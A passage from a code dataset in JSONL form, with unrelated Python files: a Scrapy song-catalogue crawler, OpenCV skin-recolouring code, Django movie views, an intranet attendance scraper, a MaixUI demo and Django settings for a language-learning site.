ob\n\n def traverse(self, name, ignore):\n rootGroup = zope.component.getUtility(IPreferenceGroup)\n rootGroup = rootGroup.__bind__(self.context)\n rootGroup.__name__ = '++preferences++'\n zope.interface.alsoProvides(rootGroup, IContainmentRoot)\n return name and rootGroup[name] or rootGroup\n","sub_path":"src/zope/preference/preference.py","file_name":"preference.py","file_ext":"py","file_size_in_byte":8960,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"736515","text":"import string\nimport scrapy\nimport hashlib\n\nclass VideolandCrawler(scrapy.Spider):\n\n name = \"videoland_crawler\"\n\n urls_alfabetic = ['https://www.videoland.com.br/wwwroot/pesquisa.asp?artista=%s&categoria=33&pagina=1' %(letter) for letter in list(string.ascii_uppercase)]\n urls_numeric = ['https://www.videoland.com.br/wwwroot/pesquisa.asp?artista=%s&categoria=33&pagina=1' %(number) for number in range(0, 10)]\n\n start_urls = urls_alfabetic + urls_numeric\n\n # print(start_urls)\n\n def parse(self, response):\n PAGINA_SELECTOR = '//b[contains(., \"Página \")]/text()'\n total_pages = int(response.xpath(\n PAGINA_SELECTOR).extract_first().split()[-1])\n # print(total_pages)\n\n yield scrapy.Request(\n response.url,\n callback=self.parse_page,\n meta={'total_pages': total_pages}\n )\n\n for contador_paginas in range(1, total_pages + 1):\n url_current_page = response.url\n current_page_number = str(url_current_page.split('=')[-1])\n\n url_next_page = ''.join(\n url_current_page.rsplit(\n current_page_number, 1)\n ) + str(contador_paginas)\n\n yield scrapy.Request(\n response.urljoin(url_next_page),\n callback=self.parse_page,\n meta={'total_pages': total_pages}\n )\n\n def parse_page(self, response):\n for contador_musicas in range(2, 42):\n\n CANTOR_SELECTOR = '//tr[{0:d}]/td[1]/font/text()'.format(contador_musicas)\n CODIGO_SELECTOR = '//tr[{0:d}]/td[2]/font/text()'.format(contador_musicas)\n TITULO_SELECTOR = '//tr[{0:d}]/td[3]/font/text()'.format(contador_musicas)\n LETRA_SELECTOR = 
'//tr[{0:d}]/td[4]/font/text()'.format(contador_musicas)\n IDIOMA_SELECTOR = '//tr[{0:d}]/td[5]/font/text()'.format(contador_musicas)\n PACOTE_SELECTOR = '//tr[{0:d}]/td[6]/font/a/text()'.format(contador_musicas)\n\n url = response.url\n\n total_pages = response.meta.get('total_pages')\n current_page = url.split('=')[-1]\n \n current_artist_search = url.split('=')[-3].split('&')[0]\n\n music_page_order = contador_musicas - 1\n\n cantor = response.xpath(CANTOR_SELECTOR).extract_first()\n codigo = response.xpath(CODIGO_SELECTOR).extract_first()\n titulo = response.xpath(TITULO_SELECTOR).extract_first()\n letra = response.xpath(LETRA_SELECTOR).extract_first()\n idioma = response.xpath(IDIOMA_SELECTOR).extract_first()\n pacote = response.xpath(PACOTE_SELECTOR).extract_first()\n\n # cantor: CANTOR\n # codigo: CÓD\n # titulo: TÍTULO\n # letra: INÍCIO DA LETRA\n # idioma: IDIOMA\n # pacote: PACOTE\n\n yield {\n 'md5': hashlib.md5(\n (\n url + str(total_pages) + cantor + codigo +\n titulo + letra + idioma + pacote\n ).encode('utf-8')\n ).hexdigest(),\n 'url': url,\n 'total_pages': total_pages,\n 'current_page': current_page,\n 'music_page_order': music_page_order,\n 'current_artist_search': current_artist_search,\n 'cantor': cantor,\n 'codigo': codigo,\n 'titulo': titulo,\n 'letra': letra,\n 'idioma': idioma,\n 'pacote': pacote,\n }\n","sub_path":"crawler.py","file_name":"crawler.py","file_ext":"py","file_size_in_byte":3601,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"317278561","text":"import numpy as np\nimport cv2\nimport sys\nfrom KMeans import get_skin_color\n\nMODE = \"RGB\"\n# MODE = \"HSV\"\n\ndef skinRange(H,S,V):\n\te8 = (H<=25) and (H>=0)\n\te9 = (S<174) and (S>58)\n\te10 = (V<=255) and (V>=50)\n\treturn (e8 and e9 and e10)\n\ndef doDiff (img, tar_color, skin_color, size):\n\tprint(\"tar color: {}, skin_color: {}\".format(tar_color, skin_color))\n\tfor i in range(3):\n\t\t_img = img[:, :, i]\n\t\ttar = tar_color[i]\n\t\tsrc = skin_color[i]\n\t\t_img = np.reshape(_img, (_img.shape[0] * _img.shape[1], 1))\n\t\t_img[_img < src] = _img[_img src] = tar + ((255-tar)*(_img[_img>src]-src) / (255-src))\n\t\t_img[_img >= 255] = 255\n\tprint(img.shape)\n\ndef make_lower_upper(skin_color,Hue,Saturation,Value):\n\tif(skin_color[0]>Hue):\n\t\tif(skin_color[0]>(180-Hue)):\n\t\t\tif(skin_color[1]>Saturation+10):\n\t\t\t\tlower1=np.array([skin_color[0]-Hue, skin_color[1]-Saturation,Value], dtype = \"uint8\")\n\t\t\t\tupper1=np.array([180, 255,255], dtype = \"uint8\")\n\t\t\t\tlower2=np.array([0, skin_color[1]-Saturation,Value], dtype = \"uint8\")\n\t\t\t\tupper2=np.array([(skin_color[0]+Hue)%180, 255,255], dtype = \"uint8\")\n\t\t\t\treturn (True,lower1,upper1,lower2,upper2)\n\t\t\telse:\n\t\t\t\tlower1=np.array([skin_color[0]-Hue, 10,Value], dtype = \"uint8\")\n\t\t\t\tupper1=np.array([180, 255,255], dtype = \"uint8\")\n\t\t\t\tlower2=np.array([0, 10,Value], dtype = \"uint8\")\n\t\t\t\tupper2=np.array([(skin_color[0]+Hue)%180, 255,255], dtype = \"uint8\")\n\t\t\t\treturn (True,lower1,upper1,lower2,upper2)\n\t\telse:\n\t\t\tif(skin_color[1]>Saturation+10):\n\t\t\t\tlower=np.array([skin_color[0]-Hue, skin_color[1]-Saturation,Value], dtype = \"uint8\")\n\t\t\t\tupper=np.array([skin_color[0]+Hue, 255,255], dtype = \"uint8\")\n\t\t\t\treturn (False,lower,upper)\n\t\t\telse:\n\t\t\t\tlower=np.array([skin_color[0]-Hue, 10,Value], dtype = \"uint8\")\n\t\t\t\tupper=np.array([skin_color[0]+Hue, 255,255], dtype = \"uint8\")\n\t\t\t\treturn 
(False,lower,upper)\n\telse:\n\t\tif(skin_color[1]>Saturation+10):\n\t\t\t\tlower1=np.array([0, skin_color[1]-Saturation,Value], dtype = \"uint8\")\n\t\t\t\tupper1=np.array([skin_color[0]+Hue, 255,255], dtype = \"uint8\")\n\t\t\t\tlower2=np.array([180-Hue+skin_color[0], skin_color[1]-Saturation,Value], dtype = \"uint8\")\n\t\t\t\tupper2=np.array([180, 255,255], dtype = \"uint8\")\n\t\t\t\treturn (True,lower1,upper1,lower2,upper2)\n\t\telse:\n\t\t\tlower1=np.array([0, 10,Value], dtype = \"uint8\")\n\t\t\tupper1=np.array([skin_color[0]+Hue, 255,255], dtype = \"uint8\")\n\t\t\tlower2=np.array([180-Hue+skin_color[0], 10,Value], dtype = \"uint8\")\n\t\t\tupper2=np.array([180, 255,255], dtype = \"uint8\")\n\t\t\treturn (True,lower1,upper1,lower2,upper2)\n\ndef change_skin(image_file, tar_color, img_path, seg_path, mode): \n\n\tif(isinstance(image_file,str)):\n\t\timg=cv2.imread(image_file,1)\n\telse:\n\t\timg=cv2.imdecode(np.fromstring(image_file.read(), np.uint8),1)\n\thsv_img = cv2.cvtColor(img, cv2.COLOR_BGR2HSV)\n\trgb_img=np.float32(cv2.cvtColor(img,cv2.COLOR_BGR2RGB))\n\tsize=img.shape\n\n\tskin_color, _ = get_skin_color(img_path, seg_path, mode) # HSV\n\n#\tif(skinRange(skin_color[hsvskin_color[1],skin_color[2])): \n\tHue=10\n\tSaturation=65\n\tValue=50\n\tresult=make_lower_upper(skin_color,Hue,Saturation,Value)\n\tif(result[0]):\n\t\tlower1=result[1]\n\t\tupper1=result[2]\n\t\tlower2=result[3]\n\t\tupper2=result[4] \n\t\tskinMask1=cv2.inRange(hsv_img, lower1, upper1)\n\t\tskinMask2=cv2.inRange(hsv_img, lower2, upper2)\n\t\tskinMask=cv2.bitwise_or(skinMask1,skinMask2)\n\telse:\n\t\tlower=result[1]\n\t\tupper=result[2]\n\t\tskinMask = cv2.inRange(hsv_img, lower, upper)\n\t\n\tskinMaskInv=cv2.bitwise_not(skinMask)\n\n\t_skin_color = np.uint8([[skin_color]])\n\t_skin_color = cv2.cvtColor(_skin_color,cv2.COLOR_HSV2RGB)\n\t_skin_color=_skin_color[0][0] # RGB\n\t_skin_color=np.int16(_skin_color)\n\n\t_tar_color = np.uint8([[tar_color]])\n\t_tar_color = cv2.cvtColor(_tar_color, cv2.COLOR_HSV2RGB)\n\t_tar_color = _tar_color[0][0]\n\t_tar_color=np.int16(_tar_color) \n\n\t# Change the color maintaining the texture.\n\tif (MODE == \"HSV\"):\n\t\tdoDiff(hsv_img, tar_color, skin_color, size)\n\t\timg2 = np.uint8(hsv_img)\n\t\timg2 = cv2.cvtColor(img2, cv2.COLOR_HSV2BGR)\n\telif (MODE == \"RGB\"):\n\t\tdoDiff(rgb_img, _tar_color, _skin_color, size)\n\t\timg2 = np.uint8(rgb_img)\n\t\timg2 = cv2.cvtColor(img2, cv2.COLOR_RGB2BGR)\n\n\n\t# Get the two images ie. 
the skin and the background.\n\timgLeft=cv2.bitwise_and(img,img,mask=skinMaskInv)\n\tskinOver = cv2.bitwise_and(img2, img2, mask = skinMask)\n\tskin = cv2.add(imgLeft,skinOver)\n\n\tres=cv2.imencode('.jpg',skin)[1].tostring()\n\treturn res\n\t\n","sub_path":"Version1/change.py","file_name":"change.py","file_ext":"py","file_size_in_byte":4360,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"392624415","text":"import cv2 as cv\nimport os.path\n\nwith open('catsource.txt', 'r') as f:\n for line in f:\n line = line.replace('//', '/')\n line = line.split()\n path = line[0]\n print(path)\n if os.path.isfile(path):\n img = cv.imread(path)\n resized = cv.resize(img, (32,32))\n path = path.replace('cat/', 'resized/')\n cv.imwrite(path, resized)\n","sub_path":"lenet_cat/resizescript.py","file_name":"resizescript.py","file_ext":"py","file_size_in_byte":403,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"485894636","text":"from django.shortcuts import render, redirect, get_object_or_404\nfrom django.views.decorators.http import require_GET, require_POST\nfrom .models import Movie, Review\nfrom .forms import MovieForm, ReviewForm\n\n# Create your views here.\n@require_GET\ndef index(request):\n movies = Movie.objects.all()\n context = {\n 'movies': movies,\n }\n return render(request, 'movies/index.html', context)\n\n\ndef create(request):\n if request.method == 'POST':\n movie_form = MovieForm(request.POST)\n if movie_form.is_valid():\n movie_form.save()\n return redirect('movies:index')\n else:\n movie_form = MovieForm()\n context = {'movie_form': movie_form}\n return render(request, 'movies/create.html', context)\n\n\n@require_GET\ndef detail(request, movie_pk):\n movie = get_object_or_404(Movie, pk=movie_pk)\n review_form = ReviewForm()\n reviews = movie.reviews.all()\n context = {\n 'movie': movie,\n 'review_form': review_form,\n 'reviews': reviews,\n }\n return render(request, 'movies/detail.html', context)\n\n\ndef update(request, movie_pk):\n movie = get_object_or_404(Movie, pk=movie_pk)\n if request.method == 'POST':\n movie_form = MovieForm(request.POST, instance=movie)\n if movie_form.is_valid():\n movie_form.save()\n return redirect('movies:detail', movie_pk)\n else:\n movie_form = MovieForm(instance=movie)\n context = {\n 'movie_form': movie_form,\n }\n return render(request, 'movies/update.html', context)\n\n\n@require_POST\ndef delete(request, movie_pk):\n movie = get_object_or_404(Movie, pk=movie_pk)\n movie.delete()\n return redirect('movies:index')\n\n\n@require_POST\ndef reviews_create(request, movie_pk):\n movie = get_object_or_404(Movie, pk=movie_pk)\n review_form = ReviewForm(request.POST)\n if review_form.is_valid():\n content = review_form.cleaned_data.get('content')\n score = review_form.cleaned_data.get('score')\n review = Review(movie_id=movie, content=content, score=score)\n review.save()\n return redirect('movies:detail', movie_pk)\n context = {'review_form': review_form}\n return render(request, 'movies/detail.html', context)\n\n\n@require_POST\ndef reviews_delete(request, movie_pk, review_pk):\n review = get_object_or_404(Review, pk=review_pk)\n review.delete()\n return redirect('movies:detail', movie_pk)\n","sub_path":"pjt_06/movies/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2425,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"20711933","text":"#!/usr/bin/env python\n\nimport 
re\nimport os\nimport csv\nimport requests\nfrom bs4 import BeautifulSoup\nfrom Class import Meetup, Workshop, Hackathon, Talk, StockAll\n\n#lien auto login sans le #!/all de fin\nautologin = \"\" + \"/module/2019/B-INN-000/BDX-0-1/\"\n\nheaders = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36'}\n\nif __name__ == '__main__':\n allActivity = []\n requete = requests.get(autologin + \"#!/all\", timeout=30)\n page = requete.content\n soup = BeautifulSoup(page, \"html.parser\")\n stock = soup.find(\"ul\", {\"class\": \"past\"})\n tmp = stock.findAll(\"li\", {\"data-nb_group\": \"1\"})\n for activite in tmp:\n tmpActivity = None\n line = activite.find('div').find('h2').find('span').find('a')\n if line.text.find('Talk') != -1 or line.text.find('Google Developer Group') != -1:\n tmpActivity = Talk(autologin, line.text)\n elif line.text.find('Meetup') != -1 or line.text.find('sentation projet Urg') != -1 or line.text.find('Pycon') != -1:\n tmpActivity = Meetup(autologin, line.text)\n elif line.text.find('Workshop') != -1:\n tmpActivity = Workshop(autologin, line.text)\n elif line.text.find('Hackathon') != -1 or line.text.find('Semaine de l\\'innovation') != -1:\n tmpActivity = Hackathon(autologin, line.text)\n if (tmpActivity != None):\n print(line)\n tmpActivity.SetTeacher(activite)\n link = activite.find(\"a\", {\"class\": \"registered\"})\n try:\n tmpActivity.scrapPresence(link['href'])\n allActivity.append(tmpActivity)\n except:\n print(\"error\")\n else:\n print(\"ERROR:\" + line.text)\n TabAllPeople = StockAll(autologin)\n for scraped in allActivity:\n TabAllPeople.AddPeople(scraped.SetScore(), scraped.GetName())\n TabAllPeople.bubletri()\n #TabAllPeople.writexls()\n TabAllPeople.TestWithoutMails()\n #TabAllPeople.SendMails()","sub_path":"urlScanIntra.py","file_name":"urlScanIntra.py","file_ext":"py","file_size_in_byte":2062,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"628395378","text":"#!/usr/bin/env python3\n\n# This file is part of MaixUI\n# Copyright (c) sipeed.com 2018, 2021\n#\n# Licensed under the MIT license:\n# http://www.opensource.org/licenses/mit-license.php\n#\n\n# adb shell 'mkdir demo'\n# adb push ../demo /demo/\n# adb push ./main.py /demo/ && adb shell 'cd /demo && python ./main.py'\n\nfrom view import vi_ui, ui_home, ai_resnet\nfrom driver import m2dock\n\ndef test_view():\n\n task = [\n ui_home.bind(vi_ui.base),\n ai_resnet.bind(vi_ui.base),\n vi_ui.base\n ]\n\n for t in task:\n with t as task:\n for i in range(100):\n task.event()\n\ntest_view()\n\n# class app_v83x(m2dock.m2dock_key):\n\n# def __init__(self) -> None:\n# m2dock.m2dock_key.__init__(self)\n# # asyncio.ensure_future(self.on_event())\n \n# self.bind_task = ai_resnet.bind(vi_ui.base)\n# self.work_task = self.bind_task\n \n# import _thread\n# _thread.start_new_thread(self.thread_event, ())\n\n# def thread_event(self):\n# import time\n# while True:\n# if self.work_task:\n# with self.work_task as task:\n# while self.bind_task == self.work_task:\n# # time.sleep(0.01)\n# task.event()\n# self.work_task = self.bind_task\n\n# def key_S1_press(self):\n# print('key_S1_press')\n# if 'ai_resnet' not in str(self.bind_task):\n# self.bind_task = ai_resnet.bind(vi_ui.base)\n\n# def key_S2_press(self):\n# print('key_S2_press')\n# if 'ui_home' not in str(self.bind_task):\n# self.bind_task = ui_home.bind(vi_ui.base)\n\n# async def on_event(self):\n# while True:\n# await 
asyncio.sleep(0.05)\n\n# if __name__ == '__main__':\n\n# # test_view()\n\n# import signal\n# signal.signal(signal.SIGINT, lambda sig, stack_frame: exit(1))\n# signal.signal(signal.SIGQUIT, lambda sig, stack_frame: exit(1))\n\n# import asyncio\n# import uvloop\n\n# uvloop.install()\n\n# app = app_v83x()\n\n# loop = asyncio.get_event_loop()\n# print(loop)\n# loop.run_forever()\n","sub_path":"examples/maix_v831/demo/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2162,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"577182249","text":"\"\"\"\nDjango settings for LingoDream Project project.\n\nFor more information on this file, see\nhttps://docs.djangoproject.com/en/dev/topics/settings/\n\nFor the full list of settings and their values, see\nhttps://docs.djangoproject.com/en/dev/ref/settings/\n\"\"\"\nimport environ\n\nROOT_DIR = environ.Path(__file__) - 3 # (lingodream/config/settings/base.py - 3 = lingodream/)\nAPPS_DIR = ROOT_DIR.path('lingodream')\n\n# Load operating system environment variables and then prepare to use them\nenv = environ.Env()\n\n# .env file, should load only in development environment\nREAD_DOT_ENV_FILE = env.bool('DJANGO_READ_DOT_ENV_FILE', default=False)\n\nif READ_DOT_ENV_FILE:\n # Operating System Environment variables have precedence over variables defined in the .env file,\n # that is to say variables from the .env files will only be used if not defined\n # as environment variables.\n env_file = str(ROOT_DIR.path('.env'))\n print('Loading : {}'.format(env_file))\n env.read_env(env_file)\n print('The .env file has been loaded. See base.py for more information')\n\n# APP CONFIGURATION\n# ------------------------------------------------------------------------------\nDJANGO_APPS = [\n # Default Django apps:\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.sites',\n 'django.contrib.messages',\n 'django.contrib.staticfiles',\n 'django.contrib.humanize',\n\n # Admin\n 'grappelli', # grappelli third party admin interface\n 'django.contrib.admin',\n]\nTHIRD_PARTY_APPS = [\n 'crispy_forms', # Form layouts\n 'allauth', # registration\n 'allauth.account', # registration\n 'allauth.socialaccount', # registration\n 'django_countries', # CountryField\n 'django_languages', # LanguageField\n 'django_messages', # user-to-user private messaging\n 'pinax.notifications',\n 'condottieri_notification', # show notifications on signing in\n 'django_comments_xtd', # these two must be present at the same time, in this order\n 'django_comments', # these two must be present at the same time, in this order\n 'avatar',\n 'taggit',\n 'taggit_templatetags2',\n]\n\n# Apps specific for this project go here.\nLOCAL_APPS = [\n # custom users app\n 'lingodream.users.apps.UsersConfig',\n # Your stuff: custom apps go here\n 'lingodream.signup',\n 'lingodream.follow',\n 'lingodream.learn',\n 'lingodream.chinese_processing',\n 'lingodream.japanese_processing',\n #'lingodream.korean_processing',\n 'lingodream.flashcards',\n 'lingodream.articles',\n 'lingodream.landing',\n\n]\n\n# See: https://docs.djangoproject.com/en/dev/ref/settings/#installed-apps\nINSTALLED_APPS = DJANGO_APPS + THIRD_PARTY_APPS + LOCAL_APPS\n\n# MIDDLEWARE CONFIGURATION\n# ------------------------------------------------------------------------------\n\nMIDDLEWARE = [\n 'django.middleware.security.SecurityMiddleware',\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 
'django.middleware.locale.LocaleMiddleware',\n 'django.middleware.common.CommonMiddleware',\n 'django.middleware.csrf.CsrfViewMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n 'django.contrib.messages.middleware.MessageMiddleware',\n 'django.middleware.clickjacking.XFrameOptionsMiddleware',\n 'lingodream.users.middleware.timezone_middleware.TimezoneMiddleware', # custom TimezoneMiddleware\n]\n\n# MIGRATIONS CONFIGURATION\n# ------------------------------------------------------------------------------\nMIGRATION_MODULES = {\n 'sites': 'lingodream.contrib.sites.migrations'\n}\n\n# DEBUG\n# ------------------------------------------------------------------------------\n# See: https://docs.djangoproject.com/en/dev/ref/settings/#debug\nDEBUG = env.bool('DJANGO_DEBUG', False)\n\n# FIXTURE CONFIGURATION\n# ------------------------------------------------------------------------------\n# See: https://docs.djangoproject.com/en/dev/ref/settings/#std:setting-FIXTURE_DIRS\nFIXTURE_DIRS = (\n str(APPS_DIR.path('fixtures')),\n)\n\n# EMAIL CONFIGURATION\n# ------------------------------------------------------------------------------\nEMAIL_BACKEND = env('DJANGO_EMAIL_BACKEND', default='django.core.mail.backends.smtp.EmailBackend')\n\n# MANAGER CONFIGURATION\n# ------------------------------------------------------------------------------\n# See: https://docs.djangoproject.com/en/dev/ref/settings/#admins\nADMINS = [\n (\"\"\"Zilong Li\"\"\", 'zilongli@protonmail.com'),\n]\n\n# See: https://docs.djangoproject.com/en/dev/ref/settings/#managers\nMANAGERS = ADMINS\n\n# DATABASE CONFIGURATION\n# ------------------------------------------------------------------------------\n# See: https://docs.djangoproject.com/en/dev/ref/settings/#databases\nDATABASES = {\n 'default': env.db('DATABASE_URL', default='postgres:///lingodream'),\n}\nDATABASES['default']['ATOMIC_REQUESTS'] = True\n\n\n# GENERAL CONFIGURATION\n# ------------------------------------------------------------------------------\n# Local time zone for this installation. 
Choices can be found here:\n# http://en.wikipedia.org/wiki/List_of_tz_zones_by_name\n# although not all choices may be available on all operating systems.\n# In a Windows environment this must be set to your system time zone.\nTIME_ZONE = 'UTC'\n\n# See: https://docs.djangoproject.com/en/dev/ref/settings/#language-code\nLANGUAGE_CODE = 'en'\n\n# See: https://docs.djangoproject.com/en/dev/ref/settings/#site-id\nSITE_ID = 1\n\n# See: https://docs.djangoproject.com/en/dev/ref/settings/#use-i18n\nUSE_I18N = True\n\n# See: https://docs.djangoproject.com/en/dev/ref/settings/#use-l10n\nUSE_L10N = True\n\n# See: https://docs.djangoproject.com/en/dev/ref/settings/#use-tz\nUSE_TZ = True\n\n# TEMPLATE CONFIGURATION\n# ------------------------------------------------------------------------------\n# See: https://docs.djangoproject.com/en/dev/ref/settings/#templates\nTEMPLATES = [\n {\n # See: https://docs.djangoproject.com/en/dev/ref/settings/#std:setting-TEMPLATES-BACKEND\n 'BACKEND': 'django.template.backends.django.DjangoTemplates',\n # See: https://docs.djangoproject.com/en/dev/ref/settings/#template-dirs\n 'DIRS': [\n str(APPS_DIR.path('templates')),\n ],\n 'OPTIONS': {\n # See: https://docs.djangoproject.com/en/dev/ref/settings/#template-debug\n 'debug': DEBUG,\n # See: https://docs.djangoproject.com/en/dev/ref/settings/#template-loaders\n # https://docs.djangoproject.com/en/dev/ref/templates/api/#loader-types\n 'loaders': [\n 'django.template.loaders.filesystem.Loader',\n 'django.template.loaders.app_directories.Loader',\n ],\n # See: https://docs.djangoproject.com/en/dev/ref/settings/#template-context-processors\n 'context_processors': [\n 'django.template.context_processors.debug',\n 'django.template.context_processors.request',\n 'django.contrib.auth.context_processors.auth',\n 'django.template.context_processors.i18n',\n 'django.template.context_processors.media',\n 'django.template.context_processors.static',\n 'django.template.context_processors.tz',\n 'django.contrib.messages.context_processors.messages',\n # Your stuff: custom template context processors go here\n 'django_messages.context_processors.inbox', # {{ messages_inbox_count }}\n 'condottieri_notification.context_processors.notification',\n ],\n },\n },\n]\n\n# See: http://django-crispy-forms.readthedocs.io/en/latest/install.html#template-packs\nCRISPY_TEMPLATE_PACK = 'bootstrap4'\n\n# STATIC FILE CONFIGURATION\n# ------------------------------------------------------------------------------\n# See: https://docs.djangoproject.com/en/dev/ref/settings/#static-root\nSTATIC_ROOT = str(ROOT_DIR('staticfiles'))\n\n# See: https://docs.djangoproject.com/en/dev/ref/settings/#static-url\nSTATIC_URL = '/static/'\n\n# See: https://docs.djangoproject.com/en/dev/ref/contrib/staticfiles/#std:setting-STATICFILES_DIRS\nSTATICFILES_DIRS = [\n str(APPS_DIR.path('static')),\n]\n\n# See: https://docs.djangoproject.com/en/dev/ref/contrib/staticfiles/#staticfiles-finders\nSTATICFILES_FINDERS = [\n 'django.contrib.staticfiles.finders.FileSystemFinder',\n 'django.contrib.staticfiles.finders.AppDirectoriesFinder',\n]\n\n# MEDIA CONFIGURATION\n# ------------------------------------------------------------------------------\n# See: https://docs.djangoproject.com/en/dev/ref/settings/#media-root\nMEDIA_ROOT = str(APPS_DIR('media'))\n\n# See: https://docs.djangoproject.com/en/dev/ref/settings/#media-url\nMEDIA_URL = '/media/'\n\n# URL Configuration\n# ------------------------------------------------------------------------------\nROOT_URLCONF = 
'config.urls'\n\n# See: https://docs.djangoproject.com/en/dev/ref/settings/#wsgi-application\nWSGI_APPLICATION = 'config.wsgi.application'\n\n# PASSWORD STORAGE SETTINGS\n# ------------------------------------------------------------------------------\n# See https://docs.djangoproject.com/en/dev/topics/auth/passwords/#using-argon2-with-django\nPASSWORD_HASHERS = [\n 'django.contrib.auth.hashers.Argon2PasswordHasher',\n 'django.contrib.auth.hashers.PBKDF2PasswordHasher',\n 'django.contrib.auth.hashers.PBKDF2SHA1PasswordHasher',\n 'django.contrib.auth.hashers.BCryptSHA256PasswordHasher',\n 'django.contrib.auth.hashers.BCryptPasswordHasher',\n]\n\n# PASSWORD VALIDATION\n# https://docs.djangoproject.com/en/dev/ref/settings/#auth-password-validators\n# ------------------------------------------------------------------------------\n\nAUTH_PASSWORD_VALIDATORS = [\n {\n 'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',\n },\n {\n 'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',\n },\n {\n 'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',\n },\n {\n 'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',\n },\n]\n\n# AUTHENTICATION CONFIGURATION\n# ------------------------------------------------------------------------------\nAUTHENTICATION_BACKENDS = [\n 'django.contrib.auth.backends.ModelBackend',\n 'allauth.account.auth_backends.AuthenticationBackend',\n #'guardian.backends.ObjectPermissionBackend', userena's dependency for privacy management\n]\n\n# Allauth authentication scheme\nACCOUNT_AUTHENTICATION_METHOD = 'email'\nACCOUNT_EMAIL_REQUIRED = True\nACCOUNT_EMAIL_VERIFICATION = 'mandatory'\nACCOUNT_EMAIL_CONFIRMATION_EXPIRE_DAYS = 3\nACCOUNT_EMAIL_CONFIRMATION_COOLDOWN = 180\nACCOUNT_LOGIN_ATTEMPTS_LIMIT = 5\nACCOUNT_LOGIN_ATTEMPTS_TIMEOUT = 600\nACCOUNT_UNIQUE_EMAIL = True\nACCOUNT_USERNAME_REQUIRED = False\n# ACCOUNT_USERNAME_MIN_LENGTH = 5\nACCOUNT_SIGNUP_FORM_CLASS = 'lingodream.signup.forms.SignupForm'\n\n\nACCOUNT_ALLOW_REGISTRATION = env.bool('DJANGO_ACCOUNT_ALLOW_REGISTRATION', True)\nACCOUNT_ADAPTER = 'lingodream.users.adapters.AccountAdapter'\nSOCIALACCOUNT_ADAPTER = 'lingodream.users.adapters.SocialAccountAdapter'\n\n# django_messages\nDJANGO_MESSAGES_NOTIFY = True\n# pinax_notifications\n# https://pinax-notifications.readthedocs.io/en/latest/settings/\n# DEFAULT_FROM_EMAIL = 'webmaster@localhost'\nPINAX_USE_SSL = False\n# PINAX_NOTIFICATIONS_QUEUE_ALL = False\n# PINAX_NOTIFICATIONS_LOCK_WAIT_TIMEOUT = -1\n# PINAX_NOTIFICATIONS_LANGUAGE_MODEL =\n\nPINAX_NOTIFICATIONS_BACKENDS = [\n (\"email\", \"pinax.notifications.backends.email.EmailBackend\"),\n ('on site', 'condottieri_notification.backends.SiteBackend'),\n]\n\n\n# django-comments-xtd\nCOMMENTS_APP = 'django_comments_xtd'\nCOMMENTS_XTD_MAX_THREAD_LEVEL = 4\nCOMMENTS_XTD_CONFIRM_EMAIL = True\n# Source mail address used for notifications.\nCOMMENTS_XTD_FROM_EMAIL = \"noreply@lingodream.com\"\n# Contact mail address to show in messages.\nCOMMENTS_XTD_CONTACT_EMAIL = \"help@lingodream.com\"\n\nCOMMENTS_XTD_APP_MODEL_OPTIONS = {\n 'default': {\n 'allow_flagging': True,\n 'allow_feedback': True,\n 'show_feedback': False,\n },\n}\n\n\n# Display formats\nDATE_FORMAT = 'j N Y'\nDATETIME_FORMAT = 'j N Y, H:i'\nSHORT_DATETIME_FORMAT = 'd/m/Y P'\nFORMAT_MODULE_PATH = [\n 'lingodream.formats',\n]\n\n# Custom settings variables\nCV_USE_HTTPS = False\nPACKAGE_DATA_DIR = str(APPS_DIR('package_data'))\nJIEBA_DICT_PATH = 
str(APPS_DIR('package_data/jieba_dict.txt.big'))\n\n\n# Custom user app defaults\n# Select the correct user model\nAUTH_USER_MODEL = 'users.User'\nLOGIN_REDIRECT_URL = 'users:redirect'\nLOGIN_URL = 'account_login'\n\n# SLUGLIFIER\nAUTOSLUG_SLUGIFY_FUNCTION = 'slugify.slugify'\n\n########## CELERY\nINSTALLED_APPS += ['lingodream.taskapp.celery.CeleryConfig']\nCELERY_BROKER_URL = env('CELERY_BROKER_URL', default='django://')\nif CELERY_BROKER_URL == 'django://':\n CELERY_RESULT_BACKEND = 'redis://'\nelse:\n CELERY_RESULT_BACKEND = CELERY_BROKER_URL\n########## END CELERY\n# django-compressor\n# ------------------------------------------------------------------------------\nINSTALLED_APPS += ['compressor']\nSTATICFILES_FINDERS += ['compressor.finders.CompressorFinder']\n\n# Location of root django.contrib.admin URL, use {% url 'admin:index' %}\nADMIN_URL = r'^admin/'\n\n# Your common stuff: Below this line define 3rd party library settings\n# ------------------------------------------------------------------------------\n\n# Localisation config\nLOCALE_PATHS = (\n str(APPS_DIR.path('locale')),\n)\n\n# Site languages\n\nLANGUAGES = (\n (\"en\", \"English\"),\n (\"zh-hans\", \"Simplified Chinese\"),\n (\"zh-hant\", \"Traditional Chinese\"),\n (\"es\", \"Spanish\"),\n (\"fr\", \"French\"),\n (\"pt\", \"Portuguese\"),\n (\"de\", \"German\"),\n (\"ja\", \"Japanese\"),\n (\"ko\", \"Chinese\"),\n (\"it\", \"Italian\"),\n (\"ru\", \"Russian\"),\n (\"ar\", \"Arabic\"),\n (\"sv\", \"Swedish\"),\n (\"hi\", \"Hindi\"),\n (\"tr\", \"Turkish\"),\n (\"pl\", 